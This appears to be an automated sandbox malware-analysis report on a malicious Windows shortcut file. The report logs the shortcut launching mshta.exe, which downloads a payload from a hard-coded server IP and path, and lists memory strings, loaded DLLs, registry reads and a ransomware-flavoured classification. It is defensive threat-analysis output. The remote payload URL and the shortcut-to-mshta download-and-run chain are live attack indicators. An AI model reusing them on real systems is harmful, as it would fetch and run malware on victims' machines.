Source: 3d#U044f.lnk |
ReversingLabs: Detection: 23% |
Source: Joe Sandbox View |
ASN Name: MIVOCLOUDMD MIVOCLOUDMD |
Source: global traffic |
HTTP traffic detected: GET /pr/relationship.tmp HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 194.180.191.34Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 194.180.191.34 |
Source: global traffic |
HTTP traffic detected: GET /pr/relationship.tmp HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 194.180.191.34Connection: Keep-Alive |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp, 3d#U044f.lnk |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp% |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7B6000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp... |
Source: mshta.exe, 00000000.00000002.2642393986.000001374E870000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp/fternet |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E6FE000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmp1 |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E7DB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpC: |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpE |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpndowsINetCookies |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E716000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpq |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpvJ |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://194.180.191.34/pr/relationship.tmpy |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://login.live.com |
Source: Initial file |
Strings: http://194.180.191.34/pr/relationship.tmp |
Source: 3d#U044f.lnk |
LNK file: http://194.180.191.34/pr/relationship.tmp /f |
Source: C:\Windows\System32\mshta.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE |
Jump to behavior |
Source: classification engine |
Classification label: mal76.rans.winLNK@1/0@0/1 |
Source: C:\Windows\System32\mshta.exe |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\relationship[1].ps |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: 3d#U044f.lnk |
ReversingLabs: Detection: 23% |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mshtml.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: powrprof.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wkscli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: umpdc.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msiso.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: srpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wininet.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ieframe.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: netapi32.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msimtf.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxgi.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: resourcepolicyclient.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: textinputframework.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coreuicomponents.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: coremessaging.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dataexchange.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d11.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dcomp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: twinapi.appcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: msls31.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d2d1.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dwrite.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: d3d10warp.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Section loaded: dxcore.dll |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings |
Jump to behavior |
Source: LNK file |
Process created: C:\Windows\System32\mshta.exe |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E768000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWp_ |
Source: mshta.exe, 00000000.00000002.2641916016.000001374E753000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2641916016.000001374E7AA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: all processes |
Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation |
Jump to behavior |